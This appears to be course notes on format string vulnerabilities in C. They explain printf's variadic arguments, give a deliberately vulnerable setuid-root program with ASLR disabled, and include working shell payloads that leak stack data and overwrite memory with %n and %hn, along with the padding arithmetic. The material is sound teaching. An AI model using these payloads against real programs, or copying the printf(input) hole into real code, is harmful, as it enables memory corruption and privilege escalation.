## <center> Format String Vulnerability </center>

### Format String

- The `printf` family of functions (`printf`, `fprintf`, `sprintf`, ...) prints a string according to a predefined format. 
- The first argument to these functions is called the *format string*. 
  - Normal characters within this string are printed as is. 
  - Characters introduced by the special annotation `%` are conversion specifiers; each one formats the next argument accordingly. 

%%writefile source/printf_example.c
#include <stdio.h>

int main() 
{
    int i=1, j=2, k=3;

    printf("Hello World \n");
    printf("Print 1 number:  %d\n", i);
    printf("Print 2 numbers: %d, %d\n", i, j);
    printf("Print 3 numbers: %d, %d, %d\n", i, j, k);
}



Run the following:

```
$ gcc -o printf_example Computer-Security/source/printf_example.c
$ ./printf_example
```

- `printf()` accepts any number of arguments. 
- https://linux.die.net/man/3/printf
- How?

%%writefile source/variable_args.c
#include <stdio.h>
#include <stdarg.h>

void myprint(int Narg, ... ) 
{
  int i;
  va_list ap;                              

  va_start(ap, Narg);                      
  for(i=0; i<Narg; i++) {
    printf("%d  ", va_arg(ap, int));       
    printf("%f\n", va_arg(ap, double));    
  }
  va_end(ap);                              
}

int main() {
  myprint(1, 2, 3.5);                      
  myprint(2, 2, 3.5, 3, 4.5);              
  return 1;
}



```
$ gcc -o variable_args Computer-Security/source/variable_args.c
$ ./variable_args
2  3.500000
2  3.500000
3  4.500000
```

- `va_start()` initializes `ap` to point to the first optional argument, the one right after `Narg`.
- `va_arg()` returns the value that `ap` currently points to, interpreted as the given type, and advances `ap` to the next argument. 

Run the following:

```
$ gcc -g -o variable_args Computer-Security/source/variable_args.c
$ gdb variable_args
gdb-peda$ break 19
gdb-peda$ run
gdb-peda$ step
gdb-peda$ info args
gdb-peda$ x/dw &Narg
gdb-peda$ x/dw &Narg + 1
gdb-peda$ x/fg &Narg + 2
gdb-peda$ x/dw &Narg + 4
gdb-peda$ x/fg &Narg + 5
```

- `x`: print value at memory position
- `d`: integer, signed decimal
- `f`: floating point number
- `w`: word (four bytes)
- `g`: giant word (eight bytes)

<center> <img src="figure/format-string/1.png" width="400"/> </center>

- `variable_args` hard-codes the type of each argument inside `myprint`. 
- `printf` instead encodes the argument types in the format string, using *format specifiers* (introduced by `%`). 
  - `printf` scans the format string and prints each character it encounters until it sees a format specifier. 
  - For each specifier, `printf` calls `va_arg()` with the type that the specifier names; this returns the next optional argument and advances the pointer to the one after it. 

```
int id = 100, age = 25;
char *name = "Bob Smith";
printf("ID: %d, Name: %s, Age: %d\n", id, name, age);
```
<center> <img src="figure/format-string/2.png" width="400"/> </center>

- `%d`: Treat the argument as an *int* number (use the decimal form). 
- `%x`: Treat the argument as an *unsigned int* (use the hexadecimal form). 
- `%s`: Treat the argument as a *string pointer*. 
- `%f`: Treat the argument as a *double* number. 

### Format String with Missing Optional Arguments

%%writefile source/missing_args.c
#include <stdio.h>
int main()
{
  int   id = 100, age = 25;
  char *name = "Bob Smith";
  printf ("ID: %d, Name: %s, Age: %d\n", id, name);    
  return 1;
}



%%writefile source/missing_args_v2.c
#include <stdio.h>
int main()
{
  int   id = 100, age = 25;
  char *name = "Bob Smith";
  char *statement = "ID: %d, Name: %s, Age: %d\n"; 
  printf (statement, id, name);
  return 1;
}



Compile and run the above examples. What is the difference?

<center> <img src="figure/format-string/3.png" width="400"/> </center>

**Why is this dangerous?**

```
printf(user_input)
```

```
sprintf(format, "%s %s", user_input, ": %d");
printf(format, program_data);
```

```
sprintf(format, "%s %s", getenv("PWD"), ": %d");
printf(format, program_data);
```

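If users control any part of the format string, they decide which specifiers `printf` processes, and therefore which stack values it reads as arguments and, with `%n`, which memory it writes to. 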

### A Vulnerable Program

%%writefile source/vul_format_string.c
#include <stdio.h>

void fmtstr()
{
    char input[100];
    int var = 0x11223344;                     
    /* print out information for experiment purpose */
    printf("Target address: %x\n", (unsigned) &var);
    printf("Data at target address: 0x%x\n", var);

    printf("Please enter a string: ");
    fgets(input, sizeof(input)-1, stdin);

    printf(input); // The vulnerable place

    printf("Data at target address: 0x%x\n",var);
}

int main() { fmtstr(); return 0; }




<center> <img src="figure/format-string/4.png" width="500"/> </center>

Run the following:

```
$ gcc -o vul Computer-Security/source/vul_format_string.c
$ sudo chown root vul
$ sudo chmod 4755 vul
$ sudo sysctl -w kernel.randomize_va_space=0
```

### Attack 1: Crash Program

- If we put several format specifiers in our input, we can get `printf()` to advance its `va_list` pointer to places beyond `printf()`'s stack frame. 
- If a `%s` then treats one of these values as a string pointer and it is an invalid address (a null pointer, protected memory, a virtual address not mapped to physical memory, ...), the program will crash.
- Try running `vul` with `%s%s%s` as the input. 

### Attack 2: Print out Data on the Stack

- `%x` prints, in hexadecimal, the integer value that the `va_list` pointer points to and advances the pointer by four bytes. 
- How can you view what is in the program's memory using `%x` ?

### Attack 3: Change Program's Data in Memory

- All `printf()`'s format specifiers print out data, except `%n`, which writes the number of characters printed out so far into memory. 

%%writefile source/print_args.c
#include <stdio.h>
int main()
{
  int   i = 0;
  printf ("Hello World%n\n", &i);    
  printf ("Character Count: %d\n", i);
  return 1;
}



When `printf()` encounters `%n`, it does the following:

- get a value pointed to by the va_list pointer,
- treat this value as an address, and
- write to the memory at that address. 

To write to a memory location through `printf()`, the address of that location must therefore be on the stack, where the `va_list` pointer can reach it. 

How do we place the desired address onto the stack?

- The `vul` program prints the address of `var`. 
- Address randomization is disabled, so this address stays the same between runs. 
- We can save our input to a file, or generate it directly with `echo`, and then *pipe* this content into `vul`. 
- This needs to be done inside a normal terminal in order to view binary characters. 

```
$ echo $(printf "\x70\xea\xff\xbf").%x.%x.%x.%x.%x.%x | ./vul
$ echo $(printf "\x70\xea\xff\xbf").%x.%x.%x.%x.%x.%n | ./vul
```
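- `.` is used as a separator for clarity. 
- With a different number of `%x`, `%n` no longer lines up with our address; `printf` then tries to write to whatever value it finds instead, which usually leads to a segmentation fault.

- Replace the address bytes in the command (`\x70\xea\xff\xbf` is `0xbfffea70` in little-endian byte order) with the value printed as **Target address** in your own run. For example, a target address of **0XBFFFF304** becomes `\x04\xf3\xff\xbf`.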

<center> <img src="figure/format-string/5.png" width="500"/> </center>

### Attack 4: Change Program's Data to a Specific Value

- We want to change `var` to `0x66887799`.
- With `%n` alone, we would first have to print `0x66887799` characters (more than 1.72 billion in decimal). 
- We can make `printf()` produce that many characters without typing them ourselves by using a precision or width modifier. 
  - A precision modifier is written as `.number` (for example `%.8x`); for integer conversions it sets the minimum number of digits to print, padding with leading zeros.
  - A width modifier is written the same way but without the decimal point (for example `%8x`); it pads with leading spaces instead of zeros. 

Run the following:

```
$ echo $(printf "\x80\xea\xff\xbf")_%.8x_%.8x_%.8x_%.8x_%.10x.%n | ./vul
$ echo $(printf "\x80\xea\xff\xbf")_%.8x_%.8x_%.8x_%.8x_%.11x.%n | ./vul
$ echo $(printf "\x80\xea\xff\xbf")_%.8x_%.8x_%.8x_%.8x_%.12x.%n | ./vul
$ echo $(printf "\x80\xea\xff\xbf")_%.8x_%.8x_%.8x_%.8x_%.13x.%n | ./vul
```

What do you see?



%%writefile source/print_alternative.c
#include <stdio.h>
int main()
{
  int   a, b, c;
  a = b = c = 0x11223344;
  
  printf ("12345%n\n", &a);
  printf ("The value of a: 0x%x\n", a);
    
  printf ("12345%hn\n", &b);
  printf ("The value of b: 0x%x\n", b);
    
  printf ("12345%hhn\n", &c);
  printf ("The value of c: 0x%x\n", c);
  return 1;
}



Compile and run the above code. 

Is there a more efficient approach?

- Use `%hn` to modify `var` two bytes at a time. 
- The value of `var` can be broken into two parts, each stored at its own address:
  - Lower two bytes to be changed to 0x7799 (Address A)
  - Higher two bytes to be changed to 0x6688 (Address B)

- What is your `var` address? On a little-endian machine this is Address A, where the lower two bytes are stored. 
- Add 2 to get Address B.

```
$ echo $(printf "\x52\xec\xff\xbf@@@@\x50\xec\xff\xbf")_%.8x_%.8x_%.8x_%.8x_%.26199x%hn_%.4368x%hn | ./vul
```

We count everything that gets printed:

**0x6688 = 26248**
- 5 `_` characters (5)
- 12 characters from the shell `printf` output: two 4-byte addresses plus `@@@@` (12)
- 4 `%.8x` specifiers, each printing 8 characters (32)
- 26199 = 26248 - (5 + 12 + 32)

**0x7799 = 30617**
- 30617 - 26248 = 4369
- 1 `_` character is printed between the two `%hn`, which leaves 4368 for the padding
- The `@@@@` gives `%.4368x` an argument to consume, so that the second `%hn` lines up with the second address

<center> <img src="figure/format-string/6.png" width="700"/> </center>

### Attack 5: Inject Malicious Code

- In principle, this is somewhat similar to a buffer-overflow attack:
  - Where is the memory location of the return address of `fmtstr()`?
  - What is the starting address of the injected shellcode?
  
- We need to write the address of the injected shellcode to the location of the return address. 

<center> <img src="figure/format-string/7.png" width="400"/> </center>

### How serious is this vulnerability?

- http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=format+string+
- https://www.ibm.com/blogs/psirt/ibm-security-bulletin-format-string-vulnerability-in-ibm-db2-tool-db2support-cve-2018-1566/

### Countermeasures

#### Developer

- Watch out for `printf` and its variants. 
- Never use user input as part of a format string. 

#### Compiler

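- Modern compilers warn about this. For example, GCC's `-Wformat-security` option (used together with `-Wformat`) flags calls such as `printf(input)`, where the format string is not a string literal and no arguments follow it. 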